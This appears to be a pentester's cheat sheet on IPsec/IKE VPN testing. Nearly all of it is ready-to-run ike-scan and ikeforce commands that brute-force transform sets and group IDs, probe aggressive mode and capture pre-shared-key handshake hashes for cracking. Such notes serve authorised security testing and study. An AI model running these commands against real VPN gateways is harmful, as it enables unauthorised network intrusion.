description |
---|
IP Security |
- https://xakep.ru/2015/05/13/ipsec-security-flaws/
- https://book.hacktricks.xyz/pentesting/ipsec-ike-vpn-pentesting
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cracking-ike-missionimprobable-part-1/
- https://github.com/SpiderLabs/ikeforce
Using ikeforce.py
:
$ sudo python ikeforce.py 10.10.13.37 -a
Using ike-scan via brute force. Generate list of all transform-sets:
$ for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "$ENC,$HASH,$AUTH,$GROUP" >> trans-dict.txt; done; done; done; done
Brute force supported transform-sets:
$ while read t; do (echo "[+] Valid trans-set: $t"; sudo ike-scan -M --trans=$t 10.10.13.37) |grep -B14 "1 returned handshake" |grep "Valid trans-set" |tee -a trans.txt; done < trans-dict.txt
Or (for aggressive mode)
$ while read t; do (echo "[+] Valid trans-set: $t"; sudo ike-scan -M -A -P'handshake.txt' -n FAKEID --trans=$t 10.10.13.37) |grep -B7 "SA=" |grep "Valid trans-set" |tee -a trans.txt; done < trans-dict.txt
Or
$ sudo python ikeforce.py -s1 -a 10.10.13.37 # -s1 for max speed
Get information about vendor:
$ sudo ike-scan -M --showbackoff [--trans=<TRANSFORM-SET>] 10.10.13.37
Test for aggressive mode ON:
$ sudo ike-scan -M -A -P -n FAKEID [--trans=<TRANSFORM-SET>] 10.10.13.37
If no hash value is returned then brute force is (maybe also) possible:
$ while read id; do (echo "[+] Valid ID: $id" && sudo ike-scan -M -A -n $id --trans=<TRANSFORM-SET> 10.10.13.37) | grep -B14 "1 returned handshake" | grep "Valid ID" |tee -a group-id.txt; done < dict.txt
Or
$ sudo python ikeforce.py 10.10.13.37 -e -w wordlists/groupnames.dic -t <TRANSFORM-SET-IN-SEPARATE-ARGS>
Dictionaries:
/usr/share/seclists/Miscellaneous/ike-groupid.txt
~/tools/ikeforce/wordlists/groupnames.dic